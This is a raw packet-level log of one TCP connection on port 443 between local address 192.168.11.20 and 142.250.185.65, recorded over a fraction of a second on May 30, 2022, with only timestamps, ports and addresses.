May 30, 2022 14:45:59.197012901 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.197146893 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.197253942 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.197284937 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.197304964 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.197309017 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.197459936 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.197484970 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.197643042 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.197645903 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.197666883 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.197838068 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.197861910 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.197992086 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.198005915 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.198026896 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.198226929 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.198246956 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.198263884 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.198419094 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.198564053 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.198586941 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.198610067 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.198668003 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.198802948 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.198826075 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.198959112 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.198966980 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.198997021 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.199146032 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.199176073 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.199203014 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.199225903 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.199335098 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.199430943 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.199449062 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.199594975 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.199611902 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.199742079 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.199757099 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.199774027 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.199876070 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.199927092 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.199951887 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.200095892 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.200102091 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.200139046 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.200253963 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.200275898 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.200292110 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.200476885 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.200490952 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.200625896 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.200639963 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.200655937 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.200836897 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.200853109 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.200997114 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.201054096 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.201080084 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.201198101 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.201287985 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.201294899 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.201316118 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.201442957 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.201471090 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.201700926 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.201706886 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.201730013 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.201988935 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.202029943 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.202059984 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.202246904 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.202367067 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.202383995 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.202565908 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.202584982 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.202725887 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.202862978 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.202886105 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.202915907 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.203135967 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.203229904 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.203259945 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.203397036 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.203572035 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.203593969 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.203619957 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.203681946 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.203746080 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.203830957 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.203861952 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.203958988 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.204029083 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.204087019 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.204107046 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.204296112 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.204312086 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.204333067 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.204490900 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.204513073 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.204667091 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.204742908 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.204766035 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.204932928 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.204953909 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.205142975 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.205167055 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.205188036 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.205216885 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.205245972 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.205322027 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.205368042 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.205391884 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.205574036 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.205610037 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.205703974 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.205754995 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.205785990 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.205874920 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.205907106 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.205965996 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.206027985 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.206047058 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.206077099 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.206125975 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.206209898 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.206223965 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.206257105 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.206383944 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.206413031 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.206562996 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.206587076 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.206742048 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.206754923 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.206778049 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.206979990 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.207043886 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.207057953 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.207079887 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.207237005 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.207252026 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.207391977 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.207400084 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.207416058 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.207551003 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.207566023 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.207726955 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.207741976 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.207761049 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.207894087 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.207910061 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.208056927 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.208084106 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.208214998 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.208308935 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.208338022 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.208405018 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.208465099 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.208590031 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.208617926 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.208642960 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.208650112 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.208812952 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.208858967 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.208889961 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.208955050 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.209100008 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.209117889 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.209134102 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.209388018 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.209392071 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.209408998 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.209665060 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.209798098 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.209871054 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.209903002 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.209990978 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.210055113 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.210150957 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.210299015 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.210364103 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.210380077 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.210459948 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.210556030 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.210624933 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.210649014 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.210711002 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.210791111 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.210799932 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.210820913 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.210952997 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.210963964 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.210977077 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.211138010 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.211152077 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.211292982 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.211307049 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.211493015 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.211499929 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.211519957 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.211754084 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.211764097 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.211785078 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.211889029 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.211899042 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.211927891 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.212095976 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.212110043 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.212249994 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.212264061 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.212393999 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.212455988 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.212471008 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.212537050 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.212635994 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.212671995 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.212687016 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.212779999 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.212829113 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.212841988 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.212986946 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.213011980 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.213032007 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.213179111 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.213188887 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.213202000 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.213401079 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.213411093 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.213433981 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.213562965 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.213573933 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.213586092 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.213762045 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.213789940 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.213918924 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.214005947 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.214034081 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.214097023 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.214159012 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.214299917 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.214303970 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.214319944 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.214349031 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.214498997 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.214512110 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.214525938 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.214710951 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.214737892 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.214890003 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.214982986 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.215010881 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.215070963 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.215172052 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.215182066 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.215207100 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.215338945 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.215487957 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.215507984 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.215661049 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.215816975 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.215929985 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.215948105 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.216125011 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.216125011 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.216301918 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.216310024 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.216320038 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.216331959 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.216502905 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.216622114 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.216634989 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.216717958 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.216723919 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.216840029 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.216850042 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217046976 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217051983 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.217061996 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217189074 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.217210054 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217278957 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.217288017 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217387915 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.217397928 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217490911 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217504025 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.217511892 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217525959 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217576027 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.217700958 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217721939 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.217732906 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217881918 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.217884064 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.217897892 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218034983 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218041897 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218050003 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218188047 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218203068 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218215942 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218358994 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218358040 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218369007 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218378067 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218533993 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218554020 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218561888 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218578100 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218704939 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218719006 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218728065 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218894005 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.218894005 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.218910933 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219043016 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.219053984 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219057083 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.219065905 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219223022 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.219239950 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219255924 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219436884 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219439030 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.219450951 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219592094 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.219602108 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219605923 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.219614029 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219753981 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.219763041 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219916105 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.219921112 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.219923019 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.219940901 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220077991 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220097065 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220125914 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220135927 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220249891 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220269918 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220280886 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220289946 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220453978 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220474005 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.220484018 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.220586061 CEST	443	49770	142.250.185.65	192.168.11.20
